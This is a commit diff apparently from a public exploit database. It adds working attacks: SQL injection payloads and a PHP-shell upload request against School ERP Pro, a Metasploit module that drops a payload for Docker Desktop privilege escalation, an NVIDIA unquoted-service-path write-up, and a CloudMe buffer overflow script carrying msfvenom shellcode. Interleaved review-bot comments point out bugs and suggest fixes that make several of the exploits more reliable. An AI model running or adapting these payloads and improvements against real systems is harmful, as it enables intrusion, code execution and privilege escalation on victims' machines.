DB: 2020-04-29
8 changes to exploits/shellcodes Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit) NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path CloudMe 1.11.2 - Buffer Overflow (PoC) School ERP Pro 1.0 - 'es_messagesid' SQL Injection School ERP Pro 1.0 - Remote Code Execution
This commit is contained in:
parent
b1e1bfd776
commit
0f5a9de36d
7 changed files with 346 additions and 2 deletions
|
@ -4,7 +4,7 @@
|
|||
# Vendor Homepage: https://www.valvesoftware.com/en/
|
||||
# Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302
|
||||
# Tested on: MacOS 15.3
|
||||
# CVE : N/A
|
||||
# CVE : CVE-2020-12242
|
||||
|
||||
import os, random, sys
|
||||
banner = """
|
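--- /dev/null
+++ b/exploits/php/webapps/48390.txt
@@ -0,0 +1,44 @@
+# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection
+# Date: 2020-04-28
+# Author: Besim ALTINOK
+# Vendor Homepage: http://arox.in
+# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
+# Version: latest version
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+SQL Injection Detail
+--------------------------------
+*# Vulnerable parameter: es_messagesid*
+*# Vulnerable code:*
+
+if($action=="fullmessage_sent"){
+$msg_qry ="SELECT * FROM es_messages WHERE
+from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and
+es_messagesid=".*$es_messagesid;*
+$details_message=$db->getrow($msg_qry);
+}
+?>
+
+*Here is the SQLmap output:*
+*----------------------------------------*
+
+GET parameter '*es_messagesid*' is vulnerable.
+sqlmap identified the following injection point(s):
+---
+Parameter: es_messagesid (GET)
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT
+6369=6369
+
+Type: UNION query
+Title: Generic UNION query (random number) - 12 columns
+Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL
+SELECT
+6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194--
+-
+---
+[01:09:41] [INFO] testing MySQL
+[01:09:42] [INFO] confirming MySQL
+[01:09:44] [INFO] the back-end DBMS is MySQL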
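Review bot: The advisory quotes the vulnerable query but never names the script it lives in or says how to fix it, so a reader can neither locate nor patch it; the payload's `pid=27&action=fullmessage_sent` points at the same student-area `index.php` dispatcher used in the companion RCE advisory, but that is an inference and should be stated outright. Because `$es_messagesid` is concatenated unquoted into the WHERE clause, the minimal remediation is `$es_messagesid = (int)$es_messagesid;` before the query, or whatever parameterised-query API `$db` offers. The `OR NOT 6369=6369` payload also shows that the `from_id=<session user_id>` restriction is defeated (OR binds lower than AND), so impact is not limited to the caller's own messages and the UNION payload reads arbitrary tables — worth saying in the detail section. `# Version: latest version` conflicts with the `1.0` in the title; one of the two should be corrected.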
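--- /dev/null
+++ b/exploits/php/webapps/48392.txt
@@ -0,0 +1,103 @@
+# Exploit Title: School ERP Pro 1.0 - Remote Code Execution
+# Date: 2020-04-28
+# Author: Besim ALTINOK
+# Vendor Homepage: http://arox.in
+# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
+# Version: latest version
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+Description
+-------------------------------------------
+A student can send a message to the admin. Additionally, with this method,
+the student can upload a PHP file to the system and run code in the system.
+
+------------------------------------
+*Vulnerable code - 1: (for student area) - sendmail.inc.php*
+- Student user can send message to admin with the attachment
+------------------------------------
+$image_file = basename($_FILES['newimage']['name'][$i]);
+$ext=explode(".",$_FILES['newimage']['name'][$i]);
+$str=date("mdY_hms");
+//$t=rand(1, 15);
+$new_thumbname = "$ext[0]".$str.$t.".".$ext[1];
+$updir = "images/messagedoc/";
+$dest_path = $updir.$new_thumbname;
+$up_images[$i] = $dest_path;
+$srcfile = $_FILES['newimage']['tmp_name'][$i];
+@move_uploaded_file($srcfile, $dest_path);
+$ins_arr_prod_images = array(
+'`es_messagesid`' => $id,
+'`message_doc`' => $new_thumbname
+);
+$idss=$db->insert("es_message_documents",$ins_arr_prod_images);
+
+---------------------------------------------------
+*PoC of the Remote Code Execution*
+---------------------------------------------------
+
+POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 ***************************
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin
+Content-Type: multipart/form-data;
+boundary=---------------------------2104557667975595321153031663
+Content-Length: 718
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c
+Upgrade-Insecure-Requests: 1
+
+-----------------------------2104557667975595321153031663
+Content-Disposition: form-data; name="subject"
+
+DEDED
+-----------------------------2104557667975595321153031663
+Content-Disposition: form-data; name="message"
+
+<p>DEDED</p>
+-----------------------------2104557667975595321153031663
+Content-Disposition: form-data; name="newimage[]"; filename="shell.php"
+Content-Type: text/php
+
+<?php phpinfo(); ?>
+
+-----------------------------2104557667975595321153031663
+Content-Disposition: form-data; name="filecount[]"
+
+1
+-----------------------------2104557667975595321153031663
+Content-Disposition: form-data; name="submit_staff"
+
+Send
+-----------------------------2104557667975595321153031663--
+
+
+------------------------------------
+*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php*
+- Admin user can update user profile photo
+------------------------------------
+if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) {
+$ext = explode(".",$_FILES['pre_image']['name']);
+$str = date("mdY_hms");
+$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
+$updir = "images/student_photos/";
+$uppath = $updir.$new_thumbname;
+move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath);
+$file = $new_thumbname;
+
+------------------------------------
+Bypass Technique:
+------------------------------------
+
+$_FILES['pre_image']['name']; --- > shell.php.png
+$ext = explode(".",$_FILES['pre_image']['name']);
+---
+$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
+$ext[0] --> shell
+$ext[1] --> php
+lastfilename --> st_date_shell.php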
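Review bot: The PoC shows the upload request but never says where the file lands or how to reach it, which is the half a reader actually needs; from `$updir = "images/messagedoc/";` and `$new_thumbname = "$ext[0]".$str.$t.".".$ext[1];` with `$t` apparently unset (its `rand()` assignment is commented out, unless it is assigned somewhere not quoted), the upload is written as `images/messagedoc/shell<mdY_hms>.php` relative to the handler's working directory, so only a second-resolution timestamp stands between the attacker and the URL — the advisory should say so and give the resulting path. The `Content-Type: text/php` part is immaterial, since neither quoted code path inspects the MIME type or validates the extension and `@move_uploaded_file` suppresses any error. Both `explode(".")` sites use `$ext[1]` rather than the last element, which is why `shell.php.png` becomes `st_date_shell.php` in the bypass section; the remediation to state is an extension allow-list, a server-generated filename, and no PHP execution under `images/`. The `Referer:` and `boundary=` headers are wrapped mid-line in the listing and will break the request if copied verbatim.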
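--- /dev/null
+++ b/exploits/windows/local/48388.rb
@@ -0,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+Rank = ManualRanking
+
+include Msf::Exploit::EXE
+include Msf::Exploit::FileDropper
+include Post::Windows::Priv
+include Post::Windows::Runas
+
+def initialize(info = {})
+super(
+update_info(
+info,
+'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',
+'Description' => %q{
+This exploit leverages a vulnerability in docker desktop
+community editions prior to 2.1.0.1 where an attacker can write
+a payload to a lower-privileged area to be executed
+automatically by the docker user at login.
+},
+'License' => MSF_LICENSE,
+'Author' => [
+'Morgan Roman', # discovery
+'bwatters-r7', # metasploit module
+],
+'Platform' => ['win'],
+'SessionTypes' => ['meterpreter'],
+'Targets' => [[ 'Automatic', {} ]],
+'DefaultTarget' => 0,
+'DefaultOptions' => {
+'WfsDelay' => 15
+},
+'DisclosureDate' => '2019-07-05',
+'Notes' =>
+{
+'SideEffects' => [ ARTIFACTS_ON_DISK ]
+},
+'References' => [
+['CVE', '2019-15752'],
+['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']
+]
+)
+)
+register_options(
+[OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]
+)
+end
+
+def docker_version
+output = cmd_exec('cmd.exe', '/c docker -v')
+vprint_status(output)
+version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0]
+Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))
+end
+
+def check
+if docker_version <= Gem::Version.new('18.09.0')
+return CheckCode::Appears
+end
+
+CheckCode::Safe
+end
+
+def exploit
+check_permissions!
+case get_uac_level
+when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+fail_with(Failure::NotVulnerable,
+"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
+when UAC_DEFAULT
+print_good('UAC is set to Default')
+print_good('BypassUAC can bypass this setting, continuing...')
+when UAC_NO_PROMPT
+print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+shell_execute_exe
+return
+end
+
+# make payload
+docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin")
+fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)
+payload_name = 'docker-credential-wincred.exe'
+payload_pathname = "#{docker_path}\\#{payload_name}"
+vprint_status('Making Payload')
+payload = generate_payload_exe
+
+# upload Payload
+vprint_status("Uploading Payload to #{payload_pathname}")
+write_file(payload_pathname, payload)
+vprint_status('Payload Upload Complete')
+print_status('Waiting for user to attempt to login')
+end
+
+def check_permissions!
+unless check == Exploit::CheckCode::Appears
+fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+end
+fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+# Check if you are an admin
+# is_in_admin_group can be nil, true, or false
+end
+end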
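Review bot: `docker_version` dereferences `output.match(...)[0]` with no nil guard, so when `docker` is not on PATH or `cmd_exec` returns an error string, `check` (and therefore `check_permissions!`) raises NoMethodError instead of reporting `CheckCode::Unknown`; the regex `(\d+\.)(\d+\.)(\d)` also captures only one digit of the patch component, so a `19.03.12` engine is read as `19.03.1`. `docker -v` reports the engine version rather than the Docker Desktop version the description (`prior to 2.1.0.1`) is about, so the `<= 18.09.0` threshold is a proxy that will misclassify any affected Desktop build bundling a later 18.09.x engine, and a comment should say which bundled engine versions the cutoff was derived from. The `print_good('BypassUAC can bypass this setting, continuing...')` line in `exploit` reads as copied from the bypassuac modules — this module does not bypass UAC, it plants a binary for the docker user to run at login, so the message is misleading. `FileDropper` is included but `payload_pathname` is never registered while `ARTIFACTS_ON_DISK` is declared; if leaving the file in place is intentional so the trigger survives session teardown, a one-line comment to that effect would prevent a later "fix".
```ruby
def docker_version
  output = cmd_exec('cmd.exe', '/c docker -v')
  vprint_status(output)
  match = output.to_s.match(/(\d+)\.(\d+)\.(\d+)/)
  return nil unless match
  Gem::Version.new(match.captures.map(&:to_i).join('.'))
end

def check
  version = docker_version
  return CheckCode::Unknown if version.nil?
  return CheckCode::Appears if version <= Gem::Version.new('18.09.0')
  CheckCode::Safe
end
# … unchanged: exploit, check_permissions! …
```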
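--- /dev/null
+++ b/exploits/windows/local/48391.txt
@@ -0,0 +1,36 @@
+# Exploit Title: NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-04-27
+# Vendor Homepage: https://www.nvidia.com/es-la/
+# Software Link : https://www.nvidia.com/es-la/
+# Tested Version: 1.0.21
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path:
+
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "NVIDIA" | findstr /i /v """
+NVIDIA Update Service Daemon nvUpdatusService C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe Auto
+
+C:\>sc qc nvUpdatusService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: nvUpdatusService
+TIPO : 10 WIN32_OWN_PROCESS
+TIPO_INICIO : 2 AUTO_START (DELAYED)
+CONTROL_ERROR : 1 NORMAL
+NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
+GRUPO_ORDEN_CARGA :
+ETIQUETA : 0
+NOMBRE_MOSTRAR : NVIDIA Update Service Daemon
+DEPENDENCIAS :
+NOMBRE_INICIO_SERVICIO: .\UpdatusUser
+
+C:\>
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path
+# undetected by the OS or other security applications where it could potentially be executed during
+# application startup or reboot. If successful, the local user's code would execute with the elevated
+# privileges of the application.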
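Review bot: The `#Exploit` paragraph says the planted code "would execute with the elevated privileges of the application", but the `sc qc` output shows `NOMBRE_INICIO_SERVICIO: .\UpdatusUser`, a dedicated local account rather than LocalSystem, so what is gained is at most execution as that account and the advisory should state that instead of implying SYSTEM. It also omits the actual precondition for an unquoted-path hijack: the attacker must be able to create `C:\Program.exe`, `C:\Program Files (x86)\NVIDIA.exe` or `C:\Program Files (x86)\NVIDIA Corporation\NVIDIA.exe`, and those directories are typically not writable by standard users on a default Windows 10 install, so exploitability hinges on ACLs the write-up never checks. Adding the `icacls` output for those three directories would make the claim verifiable. The `AUTO_START (DELAYED)` start type is worth calling out explicitly, since it means a planted binary runs at boot without user interaction.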
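--- /dev/null
+++ b/exploits/windows/remote/48389.py
@@ -0,0 +1,48 @@
+# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
+# Date: 2020-04-27
+# Exploit Author: Andy Bowden
+# Vendor Homepage: https://www.cloudme.com/en
+# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
+# Version: CloudMe 1.11.2
+# Tested on: Windows 10 x86
+
+#Instructions:
+# Start the CloudMe service and run the script.
+
+import socket
+
+target = "127.0.0.1"
+
+padding1 = b"\x90" * 1052
+EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
+NOPS = b"\x90" * 30
+
+#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
+payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
+payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
+payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
+payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
+payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
+payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
+payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
+payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
+payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
+payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
+payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
+payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
+payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
+payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
+payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
+payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
+payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
+
+overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
+
+buf = padding1 + EIP + NOPS + payload + overrun
+
+try:
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((target,8888))
+s.send(buf)
+except Exception as e:
+print(sys.exc_value)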
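Review bot: The `except` handler calls `print(sys.exc_value)`, but `sys` is never imported and `sys.exc_value` does not exist in Python 3 (the `b""` literals and `print()` call show this targets Python 3), so any connection failure is replaced by a NameError raised from the handler itself; the intended line is `print(e)`. `s.send(buf)` may transmit only part of the 1500-byte buffer, which matters for a PoC built on exact offsets, and the socket is never closed — `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` plus `s.sendall(buf)` fixes both. The return address `0x68A842B5` is annotated only as `PUSH ESP, RET`; naming the module it was taken from, and whether that module is ASLR-free, would let a reader re-base the PoC instead of having to rediscover the gadget.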
|
@ -11039,7 +11039,9 @@ id,file,description,date,author,type,platform,port
|
|||
48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
|
||||
48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
|
||||
48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
|
||||
48387,exploits/windows/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,windows,
|
||||
48387,exploits/macos/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,macos,
|
||||
48388,exploits/windows/local/48388.rb,"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)",2020-04-28,Metasploit,local,windows,
|
||||
48391,exploits/windows/local/48391.txt,"NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path",2020-04-28,"Roberto Piña",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -18113,6 +18115,7 @@ id,file,description,date,author,type,platform,port
|
|||
48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
|
||||
48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux,
|
||||
48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows,
|
||||
48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -42622,3 +42625,5 @@ id,file,description,date,author,type,platform,port
|
|||
48384,exploits/hardware/webapps/48384.txt,"Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak",2020-04-27,Besim,webapps,hardware,
|
||||
48385,exploits/php/webapps/48385.txt,"Online Course Registration 2.0 - Authentication Bypass",2020-04-27,"Daniel Monzón",webapps,php,
|
||||
48386,exploits/php/webapps/48386.txt,"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)",2020-04-27,Besim,webapps,php,
|
||||
48390,exploits/php/webapps/48390.txt,"School ERP Pro 1.0 - 'es_messagesid' SQL Injection",2020-04-28,Besim,webapps,php,
|
||||
48392,exploits/php/webapps/48392.txt,"School ERP Pro 1.0 - Remote Code Execution",2020-04-28,Besim,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|